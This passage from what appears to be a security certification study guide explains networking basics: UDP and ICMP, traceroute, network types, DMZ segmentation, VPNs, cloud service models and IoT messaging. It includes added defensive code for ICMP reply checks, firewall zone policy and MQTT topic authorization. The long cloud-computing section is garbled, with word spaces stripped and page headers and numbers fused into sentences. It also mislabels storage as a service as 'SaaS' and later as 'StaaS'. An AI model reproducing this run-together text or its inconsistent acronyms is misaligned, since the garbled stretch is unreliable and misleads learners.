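    icmp = parse_icmp(reply)
    if icmp["type"] == ICMP_TIME_EXCEEDED and icmp["code"] == 0:
        return "hop"
    if icmp["type"] == ICMP_DEST_UNREACH and icmp["code"] == PORT_UNREACH:
        return "destination"
    return "other"
```

Matching the quoted header against the probe before trusting the verdict is what stops a third party from feeding a scanner forged "closed" results, and it is also how a host knows which socket an incoming ICMP error belongs to.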
UDP is good for applications that require fast setup and transmission. As an example, streaming video and audio work well with UDP. They don't work well with TCP. One significant reason for that is that with UDP, it's up to the application to do any reordering of messages, as required. If a datagram (the PDU for UDP) comes in out of order with streaming video, the application will just discard it. The same is true with streaming audio. Imagine for a second if you were talking to someone over the Internet. You said hello to the person on the other end. In reality, that word would likely be transmitted all in one message, but let's say that each letter sound was transmitted in its own message. If you were to receive messages with the sounds l, h, l, o, and then e, what would it sound like to you? Our brains are really good at piecing missing data together and constructing something that seems whole, but it could be your brain wouldn't be able to make sense of the word as it sounded. Even if your brain could understand it, it would sound weird and your overall experience would be bad. The same is true for video, of course. If late arrivals were inserted into the video stream you were watching, it would seem very jumpy.

Why would messages come in out of order? After all, we have very reliable Internet service these days. Well, there are several reasons for messages coming out of order. Let's say that you're sending a long stream of data to someone using UDP. You are sending your data through the path A ➢ B ➢ C ➢ D, which is your destination. However, let's say C drops just as your message is about to get to it. The network corrects and routes around C, taking another path, perhaps A ➢ E ➢ F ➢ D. However, the failure occurred while at least one of your messages was in flight, and you have no way of knowing the message was just dropped due to a failure. Even if it's not a failure and messages aren't dropped, it could be that one message takes one route and a later message takes another route, which happens to be faster. The later message may arrive earlier than the prior message. There are many reasons messages may arrive out of order or even come up missing altogether. Lots of things happen in the network that users aren't aware of. That's why most applications rely on TCP. Most applications rely on messages that are presented in the correct order. Real-time protocols are less concerned about correct order, so they use UDP.

Internet Control Message Protocol

ICMP is a special case when it comes to protocols, in that it doesn't carry user data. Instead, it works with other protocols to provide error and control messaging. When something unexpected happens on the network, devices will generate ICMP messages to send back to the originating device to let it know that there was a problem. It does sit on top of IP, because it needs the addressing of IP, but it is considered to be part of the Internet layer as IP is. This also makes it a bit of an unusual protocol, because it sort of sits above the Internet layer but isn't a Transport layer protocol.

ICMP is defined in RFC 792, which specifies a header of 8 bytes. This consists of the type and code fields, which convey the essential information for ICMP, a checksum field, and then 4 bytes that are labeled "rest of header." The type and code are each a byte, and the checksum is 2 bytes. The rest of the header field contains data related to the type and code. The type and code define what goes into those 4 bytes. The type indicates the message being sent. It may have values that refer to echo reply, echo request, destination unreachable, source quench, or timestamp messages. Each type may have multiple subtypes. The different subtypes are specified by the code field. As an example, the destination unreachable type has codes that would indicate exactly what the destination is. This may be a network, a host, or a port. It may indicate that they are unreachable, or it may indicate that the message that triggered the ICMP message was administratively prohibited. Error messages such as destination unreachable and time exceeded also carry the IP header and the first 8 bytes of the datagram that triggered them, so the sender can match the error to the right connection.

Anyone doing security testing or penetration testing will most commonly run across ICMP messages through the use of ICMP echo request and echo reply messages. These are used by the ping program. You may also use the traceroute program to get the network route to a destination. The traceroute program relies on two ICMP messages. The first is ICMP type 11, which is time exceeded in transit. This means that the message's TTL field got decremented to zero. When the traceroute completes, the program expects to get an ICMP type 3, destination unreachable message, probably with the code 3, meaning destination port unreachable. That is the behavior of the classic UDP-based traceroute; implementations that probe with ICMP echo requests (Windows tracert, for example) expect an echo reply at the end instead, and TCP-based variants expect a SYN/ACK or RST.

Network Architectures

We've talked about topologies, and those are helpful to get conceptual, logical representations of your network. However, there is a larger context for the network as well. Pulling the topology together with data flows and other network elements will give you a network architecture. This describes the protocols that are used and where they are used, and you may also get security enclaves as part of a network architecture. You will also have to contend with the idea of multiple locations. From a security perspective, there are other elements to consider, including isolation. This may mean categorizing systems based on usage and risk. Some systems, especially those that need to be directly facing the Internet, meaning that external users will make network connections to those systems as a normal course of operation, may be kept separate and protected from systems where users are or even where sensitive data is stored.

Network Types

For our purposes here, we're going to categorize network types by the geography of the network. Logical diagrams are nice, but they don't give you a sense of where everything is located. Using a logical diagram, you may get the sense that systems are very close together when, in fact, they may be miles apart. Because modern network technology can cover all manner of sins, so to speak, you can have systems that are hundreds of miles apart appearing as though they are on the same physical network segment together. Because of that, we can talk about different types of networks based on their geography.

Local Area Network (LAN): A LAN is just what its name implies. All of the systems are local and probably in the same room or building or on the same floor. These systems would typically be in the same broadcast domain, a phrase that means the systems can communicate using layer 2 without having to route to other networks. (A collision domain is a narrower idea: on a modern switched network each switch port is its own collision domain, while the broadcast domain spans the whole segment.) However, they may not necessarily be communicating using layer 2. They could still be local but on a separate network segment, which would mean the traffic between those network segments would need to be routed.

Virtual Local Area Network (VLAN):
A VLAN is a LAN where the isolation at layer 2 is handled by software/firmware rather than physically. This means that some switches can be segmented into separate networks with some systems on one network segment (VLAN) and some systems on another network segment (VLAN). To get from one VLAN to another, the traffic would have to cross over a layer 3 boundary (router). This sort of segregation helps to maintain network performance. It also helps with logical organization of the network so the same set of traffic policies can be applied across the entire VLAN. Finally, there are some security considerations. With a VLAN, you can place a firewall between your network segments. While you can run host-based firewalls, it's far easier to maintain a single network firewall and restrict traffic based on the needs of each network to cross the layer 3 boundary. Bear in mind that VLAN separation is only as strong as the switch configuration: misconfigured trunk ports and native VLAN settings are what VLAN-hopping attacks abuse, so a VLAN is not by itself a security boundary equivalent to physical separation.

Wide Area Network (WAN): A WAN is a network whose nodes are more than 10 or so miles apart. Any Internet service provider would have a WAN. Additionally, businesses may have WANs where they have network connections that provide links between their different office locations. There are a number of ways to provide that sort of connectivity between geographically dispersed locations, including virtual private networks, private network circuits, or just tunneling traffic without encrypting it as a virtual private network would do.

Metropolitan Area Network (MAN): A MAN sits in between a LAN and a WAN. You may find this if a company has a campus with multiple buildings. Each building would have a LAN (or maybe multiple LANs), but the connection of LANs between all the buildings would be a MAN. The same would be true if a city had connections between all of its different offices and buildings, spread around the city. Those connections would be a MAN. Essentially, anything smaller than a WAN but spread across a larger geographic area than a LAN would be a MAN.

Isolation

Network isolation is an important concept. In fact, it's a widely recognized approach to separating network elements in order to protect sensitive data. Additionally, it would be used to separate externally accessible systems from those that are strictly internal. There are several ways to achieve this isolation.

A common approach is to use a demilitarized zone (DMZ). This is a network segment where any untrusted system would be placed. Access to this network segment could be tightly controlled using a firewall or access control lists. In Figure 2.13, you can see a simple diagram demonstrating what this may look like. The DMZ may hold systems like the web server, for example. It may also hold an email gateway to filter messages coming in before sending them on to the internal email server. There are many uses for a DMZ to isolate untrusted systems from the remainder of the network. An untrusted system is one that anyone from the Internet can get access to, which means it could be compromised in some way through the service that's exposed. Firewalls and/or access control lists prevent people from the outside getting access to internal systems. They also restrict what systems inside the DMZ can reach inside the enterprise, ideally to only the specific internal services (a database or the internal mail server, say) that each DMZ host needs, so that a compromised DMZ host cannot be used as a free pivot point into the internal network.

Figure 2.13: DMZ network (Internet, DMZ, internal servers, desktop network)

If you are using a DMZ, that suggests network isolation along with tight access control and restrictive rules around accessing the network. Network segmentation can also isolate other systems, without necessarily introducing the firewall rules or access control lists. You can see there are also network segments for internal servers as well as desktop networks. There may also be many other network segments. Each of them would have different trust levels. For example, there may also be a guest network to allow vendors and other visitors to have network access without any ability to get access to any of the internal systems.
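The segmentation just described, expressed as a zone-based policy you can evaluate, as an added example (not code from the study guide). It maps addresses to the zones in Figure 2.13 (Internet, DMZ, internal servers, desktops, plus a guest network), evaluates first-match rules with a default deny so that the DMZ can reach only the specific internal services it needs, applies the ingress anti-spoofing check mentioned in the IP addressing section, and lists the Internet-facing exposure a tester would review before an engagement. The zones, address blocks (documentation and RFC 1918 ranges) and rules are invented; a real firewall also tracks connection state and direction.

```python
"""Zone-based policy check for the DMZ layout described above.

Added example, not code from the study guide. The zones, address blocks and rules
are invented to show how a segmentation policy is evaluated; a real firewall also
tracks connection state and direction.
"""
import ipaddress
from collections import namedtuple

ZONES = {
    "dmz": ipaddress.ip_network("192.0.2.0/24"),          # public web server, mail gateway
    "internal_servers": ipaddress.ip_network("10.10.0.0/16"),
    "desktops": ipaddress.ip_network("10.20.0.0/16"),
    "guest": ipaddress.ip_network("172.16.50.0/24"),
}
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

Rule = namedtuple("Rule", "src_zone dst_zone dst_port action")   # dst_port None = any port

POLICY = [
    Rule("internet", "dmz", 443, "allow"),            # web server
    Rule("internet", "dmz", 25, "allow"),             # inbound mail to the gateway
    Rule("dmz", "internal_servers", 5432, "allow"),   # web tier to its database only
    Rule("dmz", "internal_servers", 25, "allow"),     # gateway relays to the internal mail server
    Rule("desktops", "internal_servers", None, "allow"),
    Rule("desktops", "internet", 443, "allow"),
    Rule("guest", "internet", 443, "allow"),
    # Anything not listed falls through to the default deny in evaluate().
]


def zone_of(address):
    ip = ipaddress.ip_address(address)
    for name, network in ZONES.items():
        if ip in network:
            return name
    return "internet"   # anything outside a named zone is untrusted


def evaluate(src, dst, dst_port):
    """First matching rule wins; no match means deny. Same-zone traffic never crosses the firewall."""
    src_zone, dst_zone = zone_of(src), zone_of(dst)
    if src_zone == dst_zone:
        return "allow"
    for rule in POLICY:
        if (rule.src_zone == src_zone and rule.dst_zone == dst_zone
                and (rule.dst_port is None or rule.dst_port == dst_port)):
            return rule.action
    return "deny"


def is_spoofed_ingress(src, arriving_from_zone):
    """Anti-spoofing: a packet from the internet must not claim an internal or RFC 1918 source."""
    if arriving_from_zone != "internet":
        return False
    ip = ipaddress.ip_address(src)
    return zone_of(src) != "internet" or any(ip in net for net in RFC1918)


def internet_exposure():
    """Everything an attacker on the internet can reach: the review done before a test."""
    return sorted((r.dst_zone, r.dst_port) for r in POLICY
                  if r.src_zone == "internet" and r.action == "allow")
```

The rule worth dwelling on is the pair of DMZ-to-internal entries: the web server can reach the database port and nothing else, so even after a full compromise of the DMZ host the attacker's next hop is one service on one host, not the desktop network. The same-zone shortcut in evaluate is also a reminder that segmentation controls only what crosses a boundary; two hosts on the same segment are only as separated as their own host-based controls make them.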
DMZs are not the only way to isolate networks. Protecting the rest of the network from Internet-facing services is also not the only reason to do network isolation. A common way of protecting highly sensitive information is to use enclaves. An enclave is an isolated network segment where tight controls may be placed. If you had any payment card data, such as credit card information, for instance, the systems may require not only additional protections but also additional monitoring. This may involve firewalls and intrusion detection systems, both at the network and host levels. Organizations may have several enclaves that are created for specific types of data. Credit card data (often called PCI data, after the Payment Card Industry Security Standards Council, the organization that manages the Payment Card Industry Data Security Standard, PCI DSS) is a common one, but you may also see an enclave for protected health information (PHI). If an organization has any PHI, there would be requirements from the Health Insurance Portability and Accountability Act (HIPAA) around data handling that could more easily be implemented in an enclave.

Remote Access

Jumping into the TARDIS for a moment to go way, way back in time, remote access used to be handled with modems and dial-up access. Those days are long past, though the need for remote workers to gain access to internal resources is perhaps even more necessary than it has been in the past. These days, though, remote access is often handled across the Internet. This wouldn't normally be handled in the clear across the open Internet but instead through the use of encryption. Virtual private networks (VPNs) are a way to gain access to the internal network from remote locations.

VPNs, though, are not all created equal. There are different ways to accomplish this remote access. In some cases, the remote access is a satellite office. In that case, it may not make sense to have a direct, private line from site to site. Instead, the network provider may offer something within their network to get from one location to the other. This may be done using Multiprotocol Label Switching (MPLS), for example. MPLS provides what is essentially a tunnel from one location to another by encapsulating traffic inside a label where the traffic gets switched from one location to the other. Note that MPLS by itself provides separation, not encryption; if confidentiality is required across the provider's network, IPsec or TLS still has to be layered on top.

More commonly, at least in terms of volume, there is a need for user-to-network connectivity. Even here, there are multiple ways to accomplish the task. One way, which has been around for decades at this point, was part of the work on IPv6. IP Security (IPsec) is a set of extensions that, in part, provide for encryption from one location to another. IPsec comes with a number of protocols that provide not only encryption but also message authentication, user authentication, and key exchange: the Encapsulating Security Payload (ESP) protects the packet's confidentiality and integrity, the Authentication Header (AH) provides integrity only, and the Internet Key Exchange (IKE) authenticates the peers and negotiates the keys. Because IPsec isn't an inherent part of IPv4, it requires the use of some other mechanism to implement over IPv4 networks. This generally requires inserting something into the network stack to catch the traffic being sent and applying appropriate IPsec policies.

Another type of VPN connection uses a technology that most people will be familiar with. Web connections often use Transport Layer Security (TLS), which is the current implementation of encryption for web traffic, superseding Secure Sockets Layer (SSL). As this is a well-known and commonly used method of encryption, companies often have many of the infrastructure requirements, like certificate authorities, necessary to implement this type of VPN. Additionally, this type of VPN is often deployed using a web browser rather than a heavier-weight application installation.

Cloud Computing

The world of computing has long had the nature of a pendulum, particularly when it comes to where the computing power existed. Decades ago, in the 1960s and '70s, there were service bureaus that companies went to when they had computing needs. This was because mainframes were far more expensive than most companies could afford or justify the expense of. Businesses had to trust these service bureaus with their information to have their jobs performed, whether it was payroll or data merges for mailing lists or whatever the need happened to be. When personal computers (PCs) became a thing, companies could buy one and have their own computer systems to perform the jobs they needed to have run. This meant all data processing, such as it was known at the time, could be pulled back in house. So, the pendulum swung from outsourcing to in-housing. Eventually, the cost of the PC came down, and the business could afford multiple systems, so data was stored on the individual systems, or at least on floppy disks at the users' desks. Later there were swings to put more terminals from the mainframe on users' desks
,centralizingdatastorageagain.WhentheWorldWideWebwascreatedandbusinessesstartedrealizingthevalueofhavingfull-­timeconnectionstotheInternet,theyusedhostingproviderstooutsourcefunctionslikewebsites,wheretheremaybeatleastmarketingmaterialsifnototherbusinessdata.WhenInternetaccessgottobereallycheapandubiquitous,businessestooktheirhostingbackin-­house.Allofthisistosaythatwearenowbackatapointwhereoutsourcingisthewayalotofbusinessesgo.Afterall,withsomanyusersonline,businessescanseealotoftraffictotheirsystems.Additionally,outsourcingkeepsexternallyaccessiblesystemsoffthecorporatenetwork.Thismeansattackerscan’tbreachanexternallyavailablesystemanduseitasajumping-­offpointtoothersystemsonthenetwork,includingdesktopswherepersonalinformationmaybestored,orevensensitivebusinessdata.Today’sversionofoutsourcingiscloudcomputing.Thishasseenanevolutionovertime.Initiallytherewerehostingproviders,wherecompanieswouldtakeonthecostofthehardwareandalltheinfrastructure,offeringthathardwareandinfrastructuretocompaniesthatdidn’twanttohosttheirownsystems.ThishardwarewassometimesdedicatedtotheCloudComputing 45businessthatwasrentingitforitsservices,whichmadeithardtorecoupthecostsofthehardwareandstillhavethepricingmakesensetogowithahostingprovider.ThentherewerebusinesseslikeAmazonandGooglethathadlargefarmsofsystemsthatweresometimesidle.Thesecompaniesdevelopedserviceswherebusinessescouldusethoseidlesystemsfortheirownpurposes.BecausealloftheseserviceswereavailableovertheInternet,andnotonpremises,theyweresaidtobeavailableinthecloud.Thesecloudcomputingservicescomeindifferentforms.Thefirst,andonethatlargenumbersofpeopleusetoday,isstorageasaservice(SaaS).Storageasaserviceisbasicremotediskfunctionalitythatcanbejustasgearedtowardusersastowardbusinesses.Businessesaremorelikelytouseinfrastructureasaservice(IaaS)orplatformasaservice(PaaS).Theymayalsousesoftwareasaservice,thoughthatcanalsobegearedtowardat-­homeusersaswell.Storageas 
aServiceIfyouareusinganAppledevice,youarelikelyusingstorageasaservice.AnyphotosyoutakearestorediniCloud.Yourmusicmaybestoredthere.DocumentsyoucreatecanalsobestorediniCloud.IfyouhaveanAndroiddevice,youwouldlikelyalsobeusingacloudstoragesolution,dependingonthevendor.Androiddevicesdon’talwaysusecloudstoragebydefault,thoughgenerallythereisthecapabilitytostoredataeithertoGoogleDrive,Google’sstorageasaservicesolution,ortothestorageprovidedbyanothervendor.Storageasaservicehasalargenumberofuses,includingbackupsandtheabilitytoaccessyourdatanomatterwhereyouareorwhatdeviceyouareusing.Figure 2.14showsaportionoftheinterfacefromGoogleDrive.UsingGoogleDrive,Ihavebeenabletoviewdocumentsondifferentcomputersandtablets,dependingonwhatmyneedwasatanygiventime.Thiswasusefulforperformingresearchforclassassignments,asanexample.Icouldsearchfordocumentsonmylaptop,downloadthePDFfilesofresearchpapers,andthenstoretheminmyGoogleDriveaccount,whereIcouldopenthemonatabletandreadthemcomfortably.Somestorageasaservice(StaaS)providersgiveyouaccesstoyourstorageeitherusingawebinterfaceorwithaplug-­inonyoursystemsoyoucanlookateverythinginafileexplorercontext.Thisisnotalwaysthecase.Forexample,Appledoesn’tgiveyoudirectaccesstoeverythingstorediniCloud,whetherthroughFinderorawebinterface.Instead,youhavetomanagedifferentsectionsofyourstorageusingtheapplicationsthatmakeuseofthedata.Thereare,ofcourse,downsidestousingacloudstorageprovider,asanyofthecelebritiesinvolvedinthecompromiseandtheftoftheirpersonalphotosfromacloudstorageprovider46 Chapter2  NetworkingFoundations■couldtellyou.Tocollectalargeamountofdataallatonce,it’snotnecessarytocompromisealotofsystems.Allanattackerneedstodoiscompromisethestorageprovider.Thisrequirestheprovidertomakesurethereareadequatecontrolsinplacetokeepunauthorizedusersfromgettingaccess.Theproviderisalsoexpectedtopreventdataleakage.Thismightmeananauthorizedusergettinginadvertentaccesstofilestheyshouldn’tbeauthorizedfor.FIGURE 2.14 GoogleDriveInfrastructureas 
aServiceBusinessescanspendalotofmoneyonthehardwarenecessarytomaintainalltheservicestheyrequirejusttostayoperationalandefficient.NotonlyarehardwaresystemsexpensiveCloudComputing 47whenyouaddallthehardwarecoststogether,buttheinfrastructurenecessarytosupportthehardware—­power,floorspace,networking,coolingsystems,firesuppression—­isverycostly.Keepinmindthatbestpracticeoftensuggestsprocessisolation,meaningthatsystemsdon’tnecessarilyrunmultipleapplications.Instead,theemailservergetsitsownhardware,thewebservergetsitsownhardware,andonandon.Allofthesecostsaddup.Whilevirtualizationhasbeenaroundsincethe1980s,it’sreallyonlybeeninthelastdecadeorsothatthehardwarehasbecomebeefyenoughandthesoftwarehasevolvedtobeabletoreallysupportrunningseveralvirtualsystemsontopofasinglepieceofhardware.Consumervirtualizationhasbeenaroundforages,butbusinesseshaven’tbeenabletomakeeffectiveuseofthatsoftwarebecausetheyaretryingtomanagemaybehundredsofsystems.Lotsofsmallerhypervisorsarehardertomanageatscale.Havingthemanagementcapabilitiestooperatethatmanyvirtualmachines(VMs)wasnecessary.CloudproviderssuchasAmazon,Google,andMicrosoftmakeextensiveuseofVMstogivetheiruserstheabilitytorunsystemsonhardwareownedandmaintainedbytheprovider.Thishasthepotentialtomakeinfrastructurefarmorecosteffectiveforbusinesses.Thebusinessthatneedsthesystemdoesn’thavetopaythehardwarecostsoranyoftheothercoststhatcomewithhavinghardwarearound.Additionally,businesses,particularlysmallormedium-­sizedbusinesses,probablycan’taffordhigh-­endpowermanagementwithredundancyandfaulttoleranceorhigh-­endnetworkingorcoolingorfiresuppression.Theymaynotevenbeabletofindhighlyskilledpeopletheycanaffordtopaytomaintainallthesystems.Usingtheseproviderscanhelpsharethecostsacrossallofthepeoplewhousetheservices.Certainlybycomparisontoacquiringahardwaresystemandthengettingitprovisioned,settingupaninstancewithacloudprovidertakesalmostnotime.Ifyouneedaninfrastructuresystem,yougototheportalforyourcomputingproviderandselecttheoperatingsystemyouwantandthenthes
izeofthehardware—­memorysizeanddiskspace.Figure 2.15showsasmallsampleofsystemsthatareavailablewithAmazonWebServices(AWS)usingitsElasticComputeCloud(EC2).TherearemultipledistributionsofLinuxaswellasdifferentversionsofWindowsavailable.FIGURE 2.15 AmazonWebServices48 Chapter2  NetworkingFoundations■Amazonisnot,ofcourse,theonlycompanythatdoesthis.Thereareseveralotherprovidersthatofferthesamesortofservice,includingMicrosoft,Google,andDigitalOcean.Usingthisapproach,youcouldspinupasetofinfrastructuresystemstosupportacompletewebapplicationinanafternoon.Youcouldalsogetacompletesecuritysolutionwithpoliciespreventingadversariesfromgainingunauthorizedaccess.Whiletheprovidersdotheirbesttohelpkeeptheircustomersprotected,itstillcomesdowntocorrectprovisioningonthepartofthecustomer.Microsoft,forexample,hasnetworksecuritygroupsthatallowthecustomertocreaterulestoallowanddisallowtrafficintothevirtualsystems.Thecustomercouldeasilycreatebadrules,andtherereallyisn’tanythingMicrosoftcandotokeepthatcustomerfromshootingitselfinitsbottomline.Platformas aServiceSometimesjustapieceofhardware,evenvirtual,withanoperatingsysteminstalledisn’tsufficient.Youmayneedapieceofsoftware,likeadatabaseserveroragroupwareserver.You’dneedtoacquirethesoftware,getalicense,andgetitinstalledandconfigured.Thatistime-­consuming,andit’softenverycostlyupfronttopayforthesoftware.Thenmakingsureit’sconfiguredcorrectlytakesknowledgeandskill.Thismayputitoutofreachofsmallerorganizations.Cloudprovidershaveasolutionforthisproblem.Inadditiontojustgettingasystem,youcangetaninstanceofasystemthatisalreadyconfiguredwithenterprisesoftware,likedatabaseservers,applicationservers,orevensecuritydevices.Figure 
2.16showsasmallcollectionofsomeoftheapplicationsthatareavailableintheAmazonWebServicesmarketplace.Afterselectingoneoftheseapplications,basedonwhatisneeded,thevirtualmachinewiththenecessaryoperatingsystemisstartedandtheapplicationisalreadyinstalled.Inadditiontotheonesavailableinthemarketplace,youcancreateyourownimages,storedasAmazonMachineImages(AMIs).Thismaybenecessaryifacompanyhasitsownapplication,developedin-­house,thatneedstorun.OncethereisanAMI,multipleinstancesofthatimagecanbespunupasneeded.MicrosoftalsohasamarketplacewithitsAzureservice.Figure 2.17showsalistofcategoriesinwhichimagesareavailable,aswellasalistofdatabaseserversthatyoucanselecttocreateaninstancefrom.InadditiontoalltheMicrosoft-­providedsolutions,therearealargenumberofvendorsprovidingtheirownsolutions.Inthelistofcategories,youcanseeSecurity,forexample.Someofthepossibilitiesarevirtualimagesofsolutionsthatmaynormallybethoughtofashardwareappliances.Firewalls,loadbalancers,denial-­of-­serviceprotection,andothersecurityfunctionsareavailableforselection.UsingPaaS,youcanquicklycreateanentirevirtualnetworkwithallofthevirtualdevicesneededtosupporttheserviceorapplication.Ifneeded,systemsfrominsidetheenterprisenetworkcanbeintegratedwiththeonesfromthecloudprovider.CloudComputing FIGURE 2.16 AWSmarketplaceimagesNormalaccessprotocolsarecommonlyusedtogettothevirtualdevices,likeSSHandRemoteDesktopProtocol(RDP).Thismeansthattheseserviceswouldbeexposedtotheoutsideworld,thoughaccessrulescanbecreatedtonarrowaccessdowntospecificsourceaddresses.Bydefault,though,theservicesmaybeexposedtotheoutsideworld,meaningtheyareavailabletoattack.Addressingwithintheenvironmentmaynotbestatic,though.Thismeansthateachtimesystemsarebroughtonline,theymaygetadifferentexternaladdress.Theremaybenetworkaddresstranslation(NAT)inplace,forwardingmessagesdestinedtotheexternalIPaddresstoaprivateaddressinsidethesolution.Softwareas 
aServiceNativeapplicationsthatrunonyourdesktoparen’talwaysrequiredanymore.Again,youmaynotbeboundtoaspecificsystemwithapieceofsoftwarethat’slicensedjusttothatsystem.Instead,manycompaniesareofferingtheirapplicationsinthecloud,meaningthey4950 Chapter2  NetworkingFoundations■havedevelopedtheirapplicationstoruninsideawebbrowser.YoumayhaverunacrosstheseservicesifyouhaveusedGoogleDocsorOfficeOnline,justasacoupleofexamples.Thereisalargeamountofsoftwarethat’savailablethroughawebinterface.Insomecases,asinthecaseofGoogleandMicrosoft,thereisalreadystorageasaserviceonoffer,soanydocumentsyoucreatearestoredthere.Third-­partysoftware,though,canalsointerfacewiththesestoragesolutions.FIGURE 2.17 AzureMarketplaceimagesForexample,someofthenetworkdiagramsinthischapterweredoneusingdraw.io,awebapplicationthatdoesdiagramming.SomeoftheotherdiagramsweredoneusingVisioOnline.TherearealsosolutionslikeSmartsheet,whichdoesspreadsheetsandprojectplanningonline.Customerrelationshipmanagement(CRM)canalsobeaccessedentirelythroughawebinterface.Thismakesdeliveryofthesolutionmuchfasterandeasierforthesoftwarecompany,nottomentionmuchfasterandeasierfortheconsumer.Inmanycases,CloudComputing 
you can get started without any up-front costs, depending on what you are looking for and how often you are going to use it.

From a security standpoint, this sort of solution and delivery actually has the potential to vastly improve the process of fixing vulnerabilities. When a vulnerability in a web application is discovered, it can be resolved, tested, and deployed without any work on the part of the end user. This relieves the need for automatic updates on native applications deployed on users' systems. Because applications running on an end user's system are not always updated, moving them into the browser means people aren't running out-of-date software full of vulnerabilities. It does mean, though, that potentially sensitive data is stored with a third-party service. It also means that the data is transmitted from the web browser to the service provider over the Internet. Most sites support SSL/TLS, so the communication would be encrypted, but there have been vulnerabilities in SSL, which have led to information exposure. This is not to cast doubt on SSL/TLS in any way. It's just worth keeping in mind that data being transmitted across networks has the potential to be captured and analyzed.

Internet of Things

If you don't have several of these devices in-house, you've probably seen them. The extreme examples are things such as refrigerators, toasters, and coffee machines. Beyond those, though, are home automation devices, digital video recorders, and cable/satellite set-top boxes. Any of these devices that have embedded software and also have network access are considered to be part of the Internet of Things (IoT). Essentially, anything that can be reached over the network that doesn't have a built-in screen or the ability to take direct user interaction is part of the Internet of Things. Smartphones or general-purpose computers would not be part of the Internet of Things because they have traditional input/output devices like a screen and keyboard, even if the keyboard is virtual. Many of these devices run a small, embedded implementation of Linux. Others use other embedded operating systems.

A reason to bring this up here, with cloud solutions, is that cloud providers are supporting these devices by offering communication hubs. Microsoft Azure has an IoT hub to connect these devices to. There are a couple of reasons for this. One of them is to acquire and store any data from the devices. Other applications like databases and machine learning systems can then be used with the data that's acquired for processing and analytics. Amazon has a similar offering. In addition to acquiring data from these simple devices, the hub can be used for device management. Commands could be sent to the devices from these central hubs. Common protocols like HTTP may be used to communicate with the devices. There may also be other protocols, like Message Queuing Telemetry Transport (MQTT). This would be used for enabling messaging between devices. Messaging protocols like MQTT may use a publish/subscribe model for multiple devices to gain access to a messaging bus.

These service offerings from cloud providers give every business, including startups, the ability to create an infrastructure and an application to support devices they want to manufacture without a lot of investment up front. All of the infrastructure, with a very robust implementation, is being taken care of already.
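The publish/subscribe messaging bus mentioned above, as an added example that is not from the book: a minimal MQTT-style topic filter matcher together with the per-device authorization a hub would apply so that one device can neither read another device's commands nor publish telemetry under another device's identity. The topic layout (devices/<id>/telemetry, devices/<id>/commands), the "hub" principal and the device IDs are constructed assumptions, not any cloud provider's API.

```python
"""Added example (not from the CEH study guide): MQTT-style topic filter
matching plus per-device authorization on a publish/subscribe messaging bus.
The topic layout (devices/<id>/telemetry, devices/<id>/commands), the "hub"
principal and the device IDs are constructed here, not any provider's API.
"""


def topic_matches(topic_filter: str, topic: str) -> bool:
    """MQTT 3.1.1 filter matching: '+' is exactly one level, '#' is any
    number of trailing levels and must be last, and a filter that starts
    with a wildcard never matches a '$'-prefixed (broker-internal) topic."""
    f_levels = topic_filter.split("/")
    t_levels = topic.split("/")
    if f_levels[0] in ("+", "#") and t_levels[0].startswith("$"):
        return False
    for i, level in enumerate(f_levels):
        if level == "#":
            return i == len(f_levels) - 1  # '#' anywhere else is invalid
        if i >= len(t_levels):
            return False
        if level != "+" and level != t_levels[i]:
            return False
    return len(f_levels) == len(t_levels)  # no extra topic levels left over


def authorize_subscription(principal: str, topic_filter: str) -> bool:
    """The hub may subscribe to anything; a device only under its own
    devices/<id>/commands, so a wildcard at the device-id level (which would
    expose every device's commands) is refused."""
    if principal == "hub":
        return True
    own_prefix = ["devices", principal, "commands"]
    return topic_filter.split("/")[: len(own_prefix)] == own_prefix


def authorize_publish(principal: str, topic: str) -> bool:
    """The hub may publish anywhere; a device only to its own telemetry."""
    if "+" in topic or "#" in topic:
        return False  # wildcards are never valid in a published topic name
    if principal == "hub":
        return True
    return topic == f"devices/{principal}/telemetry"


class Bus:
    """Minimal in-memory publish/subscribe bus applying the checks above."""

    def __init__(self) -> None:
        self._subs: list = []     # (principal, topic_filter, inbox)
        self.rejected: list = []  # (action, principal, topic) audit trail

    def subscribe(self, principal: str, topic_filter: str, inbox: list) -> bool:
        if not authorize_subscription(principal, topic_filter):
            self.rejected.append(("subscribe", principal, topic_filter))
            return False
        self._subs.append((principal, topic_filter, inbox))
        return True

    def publish(self, principal: str, topic: str, payload: str) -> int:
        """Deliver to every matching subscriber; return the delivery count."""
        if not authorize_publish(principal, topic):
            self.rejected.append(("publish", principal, topic))
            return 0
        delivered = 0
        for _, topic_filter, inbox in self._subs:
            if topic_matches(topic_filter, topic):
                inbox.append((topic, payload))
                delivered += 1
        return delivered


def run_demo() -> dict:
    """Two constructed devices and a hub exchanging messages over the bus."""
    bus = Bus()
    hub_inbox: list = []
    inbox_01: list = []
    inbox_02: list = []
    results = {
        # the hub collects telemetry from every device
        "sub_hub": bus.subscribe("hub", "devices/+/telemetry", hub_inbox),
        # each device listens only for its own commands
        "sub_own": bus.subscribe("dev-01", "devices/dev-01/commands/#", inbox_01),
        "sub_own_2": bus.subscribe("dev-02", "devices/dev-02/commands", inbox_02),
        # refused: dev-02 tries to read every device's commands
        "sub_wild": bus.subscribe("dev-02", "devices/+/commands", inbox_02),
        "cmd": bus.publish("hub", "devices/dev-01/commands/reboot", "now"),
        "telemetry": bus.publish("dev-01", "devices/dev-01/telemetry", "t=21C"),
        # refused: dev-01 tries to publish as dev-02
        "spoof": bus.publish("dev-01", "devices/dev-02/telemetry", "t=99C"),
    }
    results.update(hub_inbox=hub_inbox, inbox_01=inbox_01,
                   inbox_02=inbox_02, rejected=bus.rejected)
    return results
```

The `rejected` list is the audit trail a real broker would log: both refused operations are exactly the cross-device reads and impersonated writes that an exposed messaging bus makes possible.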
Summary

Networking computer systems has fundamentally changed the way we do business, work, and live. It's all happened in a very short time. Computer networks have also provided easy means for people and businesses to be attacked remotely. They have changed the face of how some criminal organizations operate. They provide an easy way to perpetrate fraud and theft. It's because of all of this, and also because much of what we'll be talking about in coming chapters relies on networks, that it can be really helpful to understand the fundamentals of computer networking.

Conceptual frameworks can help with understanding how communication between systems and applications takes place. There are two frameworks, or models, that are commonly referred to. The first is the OSI model. It has seven layers—Physical, Data Link, Network, Transport, Session, Presentation, and Application. Every system that is on a network has functionality that can be mapped to each of those layers. One thing to keep in mind as you are thinking about these models is that a layer on one system communicates with the corresponding layer on the system with which it's communicating. The Network layer in the sent message is handled by the Network layer on the receiving side, for example.

